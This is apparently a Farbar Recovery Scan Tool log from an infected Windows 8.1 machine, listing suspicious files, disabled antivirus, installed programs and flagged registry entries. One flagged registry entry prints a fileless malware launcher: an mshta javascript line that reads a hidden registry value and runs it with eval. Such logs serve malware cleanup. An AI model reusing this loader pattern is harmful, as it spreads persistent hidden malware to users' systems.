1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\pAuZbg.exe

1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\YuIeaAuVrYQ.exe

2018-03-22 21:50 - 2018-03-22 21:50 - 000481104 _____ (DriverPack) C:\Users\Dan\AppData\Roaming\DRP.exe

2017-03-29 19:14 - 2018-06-14 21:27 - 000000074 _____ () C:\Users\Dan\AppData\Roaming\sp_data.sys

2018-03-22 21:49 - 2018-03-22 21:49 - 000724992 _____ () C:\Users\Dan\AppData\Roaming\virtualexechange.exe

2018-03-22 21:49 - 2018-03-22 21:49 - 000000001 _____ () C:\Users\Dan\AppData\Roaming\w.txt

2015-02-02 09:28 - 2015-02-03 07:25 - 000000068 _____ () C:\Users\Dan\AppData\Roaming\WB.CFG

2015-01-25 12:12 - 2016-03-06 16:31 - 000000365 _____ () C:\Users\Dan\AppData\Roaming\WPLAEHX

2015-04-29 13:39 - 2015-04-29 13:39 - 000200331 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS

2015-04-29 13:39 - 2015-04-29 13:39 - 000000290 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS.part

2015-04-29 13:34 - 2015-04-29 13:34 - 000385602 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS

2015-04-29 13:34 - 2015-04-29 13:38 - 000000220 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS.part

2015-04-29 13:39 - 2015-04-29 13:39 - 000146145 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS

2015-04-29 13:39 - 2015-04-29 13:39 - 000000274 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS.part

1623-04-04 13:03 - 1623-04-04 13:03 - 000192512 ____N (Microsoft Corporation) C:\Users\Dan\AppData\Local\agjCu.exe

2015-09-05 13:42 - 2016-04-20 16:08 - 000017920 _____ () C:\Users\Dan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ () C:\Users\Dan\AppData\Local\recently-used.xbel

2018-06-14 21:36 - 2018-06-14 21:36 - 000000077 _____ () C:\Users\Dan\AppData\Local\smplayerhdpi.ini

2018-03-22 21:50 - 2018-03-22 21:50 - 000000003 _____ () C:\Users\Dan\AppData\Local\wbem.ini

 

==================== Bamital & volsnap ======================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\dnsapi.dll => File is digitally signed

C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

C:\Windows\system32\drivers\coooruyb.sys -> Access Denied <======= ATTENTION

 

LastRegBack: 2018-05-29 22:18

 

==================== End of FRST.txt ============================

 

 

My Addition.txt -

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 06.06.2018 01

Ran by Dan (14-06-2018 21:44:27)

Running from D:\

Windows 8.1 Connected (Update) (X64) (2015-01-30 09:55:12)

Boot Mode: Normal

==========================================================

 

 

==================== Accounts: =============================

 

Administrator (S-1-5-21-1066246007-1091995785-1061003623-500 - Administrator - Disabled)

Dan (S-1-5-21-1066246007-1091995785-1061003623-1001 - Administrator - Enabled) => C:\Users\Dan

Guest (S-1-5-21-1066246007-1091995785-1061003623-501 - Limited - Disabled)

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AV: Bitdefender Antivirus Free Edition (Disabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}

AS: Bitdefender Antivirus Free Edition (Disabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}

AS: Comodo Defense+ (Disabled - Up to date) {6BAD9487-8DE8-D130-293E-C6A728B4104F}

AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

FW: COMODO Firewall (Disabled) {E8F7F446-E1BD-DFE6-38D1-54E0ADE01D89}

 

==================== Installed Programs ======================

 

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

4K Video Downloader 4.4 (HKLM-x32\...\{CAB406EC-AF92-417D-9BBB-B2ECE1BC7BA6}) (Version: 4.4.2.2255 - Open Media LLC)

7-Zip (HKLM\...\{F43D5365-6E1C-4A2B-BE51-E16D9554FB1D}) (Version: 9.2.0 - 7-Zip) Hidden

7-Zip (HKLM-x32\...\7-Zip 9.2.0) (Version: 9.2.0 - 7-Zip)

Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)

Adobe After Effects CC 2015.3 (HKLM-x32\...\AEFT_13_8_0) (Version: 13.8.0 - Adobe Systems Incorporated)

Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)

Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_3_0) (Version: 10.3.0 - Adobe Systems Incorporated)

Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)

Aeon (HKLM-x32\...\Aeon) (Version: 3.7.4 - SoundSpectrum)

Andy OS (HKLM\...\Andy OS) (Version: 0.45.5.0 - Andy OS, Inc)

Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)

Applian Director (HKLM-x32\...\Applian Director3.01) (Version: 3.01 - Applian Technologies Inc.)

ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)

ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.2.8 - ASUS)

ASUS Screen Saver (HKLM-x32\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 1.0.3 - ASUS)

ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 2.2.14 - ASUS)

ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 2.01.0021 - ASUS)

ASUSDVD (HKLM-x32\...\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.) Hidden

ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.)

AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.12.311 - ASUSTEK)

AVS Audio Converter 8.1.1 (HKLM-x32\...\AVS Audio Converter_is1) (Version: 8.1.1.549 - Online Media Technologies Ltd.)

AVS Audio Editor 8.1.1 (HKLM-x32\...\AVS Audio Editor_is1) (Version: 8.1.1.506 - Online Media Technologies Ltd.)

AVS Disc Creator 5.2.5 (HKLM-x32\...\AVS Disc Creator_is1) (Version: 5.2.5.536 - Online Media Technologies Ltd.)

AVS Document Converter 3.0.2 (HKLM-x32\...\AVS Document Converter_is1) (Version: 3.0.2.238 - Online Media Technologies Ltd.)

AVS Image Converter 4.0.2 (HKLM-x32\...\AVS Image Converter_is1) (Version: 4.0.2.281 - Online Media Technologies Ltd.)

AVS Media Player 4.3.1 (HKLM-x32\...\AVS Media Player_is1) (Version: 4.3.1.114 - Online Media Technologies Ltd.)

AVS Photo Editor 2.3.4 (HKLM-x32\...\AVS Photo Editor_is1) (Version: 2.3.4.148 - Online Media Technologies Ltd.)

AVS Registry Cleaner 3.0.3 (HKLM-x32\...\AVS Registry Cleaner_is1) (Version: 3.0.3.272 - Online Media Technologies Ltd.)

AVS Video Converter 9.2.1 (HKLM-x32\...\AVS4YOU Video Converter 7_is1) (Version: 9.2.1.579 - Online Media Technologies Ltd.)

AVS Video Editor 7.2.1 (HKLM-x32\...\AVS Video Editor_is1) (Version: 7.2.1.269 - Online Media Technologies Ltd.)

AVS Video ReMaker 5.0.2 (HKLM-x32\...\AVS Video ReMaker_is1) (Version: 5.0.2.175 - Online Media Technologies Ltd.)

Bandicam (HKLM-x32\...\Bandicam) (Version: 3.0.4.1036 - Bandisoft.com)

Bandicut (HKLM-x32\...\Bandicut) (Version: 1.2.7.132 - Bandisoft.com)

Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)

Beta Bugs FloFi VST (HKLM-x32\...\FloFi) (Version: "1.1.0" - "BetaBugs")

Beta Bugs Moneo VST (HKLM-x32\...\Moneo) (Version: "1.0.0" - "BetaBugs")

Beta Bugs WideBug VST (HKLM-x32\...\WideBug) (Version: "1.0.0" - "BetaBugs")

Bitdefender Antivirus Free Edition (HKLM\...\BitDefender Gonzales) (Version: 1.0.21.1109 - Bitdefender)

Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)

CCleaner (HKLM\...\CCleaner) (Version: 5.15 - Piriform)

COMODO Firewall (HKLM\...\{1EBC6C6F-7D31-4897-B241-DC7052F3E7A5}) (Version: 8.2.0.5027 - COMODO Security Solutions Inc.)

CrazyTalk Animator v2.0 Pipeline (HKLM-x32\...\{7127D4CC-78E6-41E3-8BCB-A50ED34846E2}) (Version: 2.0.1214.1 - Reallusion Inc.)

CrazyTalk v7.32 Standard (HKLM-x32\...\{27C4EA98-84A3-4CDF-A436-F984A0283357}) (Version: 7.32.3114.1 - Reallusion Inc.)

D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden

DaVinci Resolve (HKLM\...\{9B4515CC-A703-49D2-85E6-5348CA30534D}) (Version: 12.5.0032 - Blackmagic Design)

DS-MP3 Source 1.30 (HKLM-x32\...\DS-MP3 Source) (Version:  - )

Eusing Free MP3 Cutter (HKLM-x32\...\Eusing Free MP3 Cutter) (Version:  - )

FaceGen Artist Demo (HKLM-x32\...\{280BB5D8-30DC-4D62-B4D5-A3C19BB30479}) (Version: 1.10.0.0 - Singular Inversions Inc.)

FaceGen Artist Pro (HKLM-x32\...\{F6F73B62-D4E0-46B0-BD1C-3F4F55B107D8}) (Version: 1.10.0.0 - Singular Inversions Inc.)

Flvto Youtube Downloader (HKLM-x32\...\Flvto Youtube Downloader) (Version: 0.6.9 - Hotger)

Gadwin PrintScreen (64-Bit) (HKLM\...\{819A52E1-0929-469A-BEB6-1AEBE0873CFC}) (Version: 5.4.2.0 - Gadwin Systems)

GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 65.0.3325.181 - Google Inc.)

Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden

Gramblr (HKLM\...\Gramblr) (Version: 2.9.127 - Gramblr Team)

GROOVE 5.6.3 Pro Edition (HKLM\...\{21D8E7FE-7FE7-46B3-B578-22E1ABC5E407}) (Version: 5.6.3 - Gemini)

Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3355 - Intel Corporation)

Intel® Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.0.0.1002 - Intel Corporation)

Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)

ISSE version 0.2.0 (HKLM\...\{9330BAEC-6E26-4C5B-93A1-8BDD9ACF231B}_is1) (Version: 0.2.0 - CCRMA, Stanford University)

ivsEdits Free Edition (HKLM-x32\...\ivsEdits Free Edition) (Version:  - )

Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)

JBridge (HKLM-x32\...\JBridge) (Version:  - JBridge)

Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

KRISTAL Audio Engine (HKLM-x32\...\KRISTAL Audio Engine) (Version:  - )

Lightworks (HKLM-x32\...\{E94DD4E4-7746-472c-AA7B-1242FED0CFC8}) (Version: 12.6.0.0 - Lightworks)

LUXONIX LFX-1310 (HKLM-x32\...\LUXONIX_LFX-1310) (Version: 1.4 - LUXONIX)

MakeMKV v1.9.1 (HKLM-x32\...\MakeMKV) (Version: v1.9.1 - GuinpinSoft inc)

Massey Plugins Demos [Remove only] (HKLM-x32\...\Massey Plugins Demos) (Version:  - )

MediaShuttlePlugin-v5.4 (HKLM-x32\...\{BA567CFA-F158-44C3-AA40-1773478BD477}) (Version: 5.4.4.71844 - Signiant Inc.)

Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)

Microsoft OneDrive (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\OneDriveSetup.exe) (Version: 18.025.0204.0009 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)

Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)

Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)

Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)

Movavi Video Editor 11 (HKLM-x32\...\Movavi Video Editor 11) (Version: 11.4.1 - Movavi)

Movavi Video Suite 12 (HKLM-x32\...\Movavi Video Suite 12) (Version: 12.0.0 - Movavi)

Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

Mozilla Firefox 55.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 en-US)) (Version: 55.0.3 - Mozilla)

Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 54.0 - Mozilla)

mp3splt-gtk (HKLM-x32\...\mp3splt-gtk) (Version:  - )

Muvizu:Play - Heroes and villains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroesAndVillains) (Version:  - Digimania Ltd)

Muvizu:Play - Heroes and villains Lairs (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroAndVillainLairs) (Version:  - Digimania Ltd)

Muvizu:Play - Lighting Presets (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuLightingPresets) (Version:  - Digimania Ltd)

Muvizu:Play - Mandy Content (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuMandyContentPack) (Version:  - Digimania Ltd)

Muvizu:Play - Prisons (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuPrisons) (Version:  - Digimania Ltd)

Muvizu:Play - Rosie (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuRosie) (Version:  - Digimania Ltd)

Muvizu:Play - Trains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuTrains) (Version:  - Digimania Ltd)

Muvizu:Play (HKLM-x32\...\Muvizu) (Version: 2015.08.20.01R - Digimania Ltd)

ocenaudio (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ocenaudio) (Version: 2.0.14 - ocenaudio Team)

PitchWorks remove (HKLM-x32\...\PitchWorks DX) (Version:  - )

PrimoPDF -- brought to you by Nitro PDF Software (HKLM-x32\...\PrimoPDF) (Version: 5 - Nitro PDF Software)

Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)

QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)

Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.27040 - Realtek Semiconductor Corp.)

Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7213 - Realtek Semiconductor Corp.)

Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)

Replay Media Catcher 5 (5.0.1.54) (HKLM-x32\...\Replay Media Catcher 5) (Version: 5.0.1.54 - Applian Technologies)

Replay Video Capture 7 (HKLM-x32\...\Replay Video Capture7.4) (Version: 7.4 - Applian Technologies Inc.)

SearchAwesome (HKLM\...\6320c4d4d9492959f6f8b43b8fdbf2f5) (Version: 13.14.1.204 (i1.0) - SearchAwesome) <==== ATTENTION

ShapeShop B5 (HKLM-x32\...\ShapeShop) (Version:  - )

Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)

SMPlayer 16.6.0 (HKLM-x32\...\SMPlayer) (Version: 16.6.0 - Ricardo Villalba)

Softube Plug-Ins (VST AAX 32-bit) (HKLM-x32\...\Softube Plug-Ins (VST AAX 32-bit)) (Version: 2.2.91 - Softube AB)

Synfig Studio (HKLM-x32\...\synfigstudio) (Version: 1.0.2 - )

Total Recorder 8.5 Standard Edition (HKLM-x32\...\TotalRecorder) (Version:  - )

Tupi version 0.2-4 (HKLM-x32\...\Tupi_is1) (Version: 0.2-4 - )

Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 3.8.3 - Tweaking.com)

Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version:  - WildTangent) Hidden

Virtual Magnifying Glass v3.6 (HKLM-x32\...\Virtual Magnifying Glass_is1) (Version:  - )

VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)

VMware Player (HKLM\...\{E452E727-86B8-4233-8CC3-41FD817AFAFF}) (Version: 6.0.7 - VMware, Inc.) Hidden

VMware VIX (HKLM-x32\...\{F99FC179-EA67-4BBC-8955-BDDA0CB94B88}) (Version: 1.13.7.62285 - VMware, Inc.)

WD My Cloud (HKLM\...\{3082756C-2147-411F-AE6A-9DCEF0121903}) (Version: 1.0.7.5 - Western Digital Technologies, Inc.)

WebStorage (HKLM-x32\...\WebStorage) (Version: 2.1.2.301 - ASUS Cloud Corporation)

WhiteCap (HKLM-x32\...\WhiteCap) (Version: 5.0.5 - SoundSpectrum)

WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-asus) (Version: 4.0.11.2 - WildTangent)

Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)

Windows Driver Package - ASUS (ATP) Mouse  (03/17/2014 1.0.0.207) (HKLM\...\AA2CC56D4BBEE037DC99871F5F6551133D2A0CC3) (Version: 03/17/2014 1.0.0.207 - ASUS)

Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)

Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )

WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.42.0 - ASUS)

WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)

WinRAR 5.31 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)

WinX DVD Ripper Platinum 7.5.18 (HKLM-x32\...\WinX DVD Ripper Platinum_is1) (Version:  - Digiarty Software, Inc.)

WonderFox DVD Ripper Speedy 8.1 (HKLM-x32\...\WonderFox DVD Ripper Speedy) (Version: 8.1 - WonderFox Soft, Inc.)

WonderFox DVD Video Converter 10.0 (HKLM-x32\...\WonderFox DVD Video Converter) (Version: 10.0 - WonderFox Soft, Inc.)

Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version:  - Yahoo! Inc.)

 

==================== Custom CLSID (Whitelisted): ==========================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ChromeHTML: ->  <==== ATTENTION

CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Dan\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileCoAuthLib64.dll => No File

CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Classes\f2e8449: "C:\Windows\system32\mshta.exe" "javascript:TOWG9H8n="9fTue2";F6q=new ActiveXObject("WScript.Shell");yYl78Ye="OOPGIb";j0tdG8=F6q.RegRead("HKCU\\software\\wsfl\\nfhvb");CnQ2SRmC="VxncXy";eval(j0tdG8);Cw1zFO6q="2Od3ft0";" <==== ATTENTION

ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()

ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()

ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()

ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)

ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)

ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)

ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)

ContextMenuHandlers1-x32: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()

ContextMenuHandlers1-x32: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)

ContextMenuHandlers1-x32: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)

ContextMenuHandlers1-x32: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2015-04-06] (Online Media Technologies Ltd.)

ContextMenuHandlers1-x32: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File

ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)

ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)

ContextMenuHandlers1-x32-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)

ContextMenuHandlers2: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)

